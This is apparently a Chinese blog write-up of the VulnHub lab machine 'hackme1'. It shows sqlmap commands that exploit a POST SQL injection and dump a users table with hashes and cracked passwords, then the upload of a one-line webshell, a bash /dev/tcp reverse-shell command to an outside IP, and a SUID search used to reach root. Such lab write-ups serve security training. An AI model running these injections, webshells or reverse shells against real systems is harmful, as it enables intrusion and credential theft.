vulnhub - hackme1

vulnhub - hackme1

信息收集

端口扫描

image-20240613191828379

详细扫描

image-20240613191900797

目录扫描跟漏洞探测没发现什么可用信息,除了登录还有一个uploads目录应该是进入后台之后才能使用

web主页是个登录注册页面,爆了一下admin没进去,随便注册个账户登入

image-20240613192040510

SQL注入

点击search按钮发现是个书本目录,这个结构很容易想到sql注入,是POST查询的

image-20240613192341801

测试成功,sqlmap启动。抓post包存为data.txt

image-20240613193843755

sqlmap -r data.txt --level 3 --dbs --batch

[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapphacking


sqlmap -r data.txt --level 3 -D webapphacking --tables --batch

+-------+
| books |
| users |
+-------+


sqlmap -r data.txt --level 3 -D webapphacking -T users --columns --batch

+---------+----------------------+
| Column  | Type                 |
+---------+----------------------+
| name    | varchar(30)          |
| user    | varchar(30)          |
| address | varchar(50)          |
| id      | smallint(5) unsigned |
| pasword | varchar(70)          |
+---------+----------------------+

sqlmap -r data.txt --level 3 -D webapphacking -T users -C name,user,pasword --dump --batch

+--------------+------------+---------------------------------------------+
| name         | user       | pasword                                     |
+--------------+------------+---------------------------------------------+
| David        | user1      | 5d41402abc4b2a76b9719d911017c592 (hello)    |
| Beckham      | user2      | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| anonymous    | user3      | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| testismyname | test       | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| superadmin   | superadmin | 2386acb2cf356944177746fc92523983            |
| test1        | test1      | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 123          | test123    | 4297f44b13955235245b2497399d7a93 (123123)   |
+--------------+------------+---------------------------------------------+

查询一下superadmin的明文密码得到Uncrackable

image-20240613194500027

文件上传

登入果然可以文件上传

image-20240613194853842

没有过滤,直接传一个一句话木马,对应文件位置为刚才扫到的uploads目录

image-20240613194928218

反弹shell并提权

蚁剑反弹shell

bash -c 'bash -i >& /dev/tcp/192.168.157.161/9999 0>&1'

image-20240613195411444

使用find查询可以进行suid的文件

find / -perm -u=s -type f 2>/dev/null

发现可疑文件/home/legacy/touchmenot,查看后发现是个二进制文件

image-20240613195932360

直接运行试试

image-20240613200219324

直接提权为root

posted @ 2024-06-13 20:08  Mar10  阅读(3)  评论(0编辑  收藏  举报